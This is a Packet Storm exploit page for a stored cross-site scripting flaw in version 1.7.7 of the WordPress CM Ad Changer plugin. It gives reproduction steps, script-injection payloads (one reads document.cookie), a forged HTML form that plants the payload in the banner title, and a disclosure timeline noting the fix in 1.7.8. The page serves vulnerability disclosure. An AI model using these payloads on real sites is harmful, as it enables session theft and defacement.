exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress CM Ad Changer 1.7.7 Cross Site Scripting

WordPress CM Ad Changer 1.7.7 Cross Site Scripting
Posted Jun 11, 2016
Authored by Aaditya Purani

WordPress CM Ad Changer plugin version 1.7.7 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | c0be27eebca044470644e7a969b0287dff5a39a5a9e9b7408c2acf09861d5431

WordPress CM Ad Changer 1.7.7 Cross Site Scripting

Change Mirror Download
#Exploit Title: CM Ad Changer Plugin XSS
#Date: 9/6/2016
#Exploit Author: Aaditya Purani
#Author Homepage: https://aadityapurani.com
#Vendor Homepage: https://ad-changer.cminds.com
#Software Link: https://downloads.wordpress.org/plugins/cm-ad-changer.zip
(Updated)
#Version: 1.7.7
#Tested on: Wordpress 4.5.2
#Category: Web applications

Description:
An Stored Cross Site Scripting was reported by me to CM Ad Plugins under
which an Unprivileged user can Trigger a Stored XSS to perform malicious
action or any attacker could send a Crafted link which can trigger Stored
XSS

Steps to Produce:

1) Go to CM Ad changers -> Campaigns

2) Create a Campaign. Enter whatever you want in Campaign settings, in the
next tab "Campaign Banners", select an Image in Campaign images and in
Banner Title enter this payload
</script><script>confirm(/aaditya/)</script>
</script><script>confirm(document.cookie)</script>

3) Enter Save & Payload triggers everytime you Return.

Attacker Can Make a Payload File containing the following:

<html>

<body>
<h1> Click The button below. POC By Aaditya Purani:: CM AD Changer
1.7.7 </h1>
<form action="
http://127.0.0.1/wordpress/wp-admin/admin.php?page=cmac_campaigns&action=edit&campaign_id={TARGET_ID}"
method="POST">
<input type="hidden" name="campaign_id" value="1" />
<input type="hidden" name="title" value="Hacked by Aaditya" />
<input type="hidden" name="comment" value="" />
<input type="hidden" name="link" value="" />
<input type="hidden" name="status" value="on" />
<input type="hidden" name="banner_display_method" value="selected" />
<input type="hidden" name="banner_filename[]"
value="yourpicvalue.jpg" />
<input type="hidden" name="banner_title[]"
value="</script><script>confirm(/aaditya/)</script>" />
<input type="hidden" name="banner_title_tag[]" value="" />
<input type="hidden" name="banner_tag[]" value="" />
<input type="hidden" name="banner_link[]" value="" />
<input type="hidden" name="banner_weight[]" value="0" />
<input type="hidden" name="selected_banner" value="yourpicvalue.jpg"
/>
<input type="hidden" name="submit" value="Save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

This will Trigger Stored XSS at banner_title Parameter.

It has been fixed and Version 1.7.8 Released on 9th June
Visit Here:
https://ad-changer.cminds.com/cm-ad-changer-plugin-free-edition-release-notes

---------Timeline----------

1st June : Reported to Vendor Creative Minds
3rd June: Additional Information provided
6th June: Team will able to reproduce
7th June: Fix and confirmed by me
9th June: Publically Fix released & Changelog updated 1.7.8

Regards,
Aaditya Purani
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close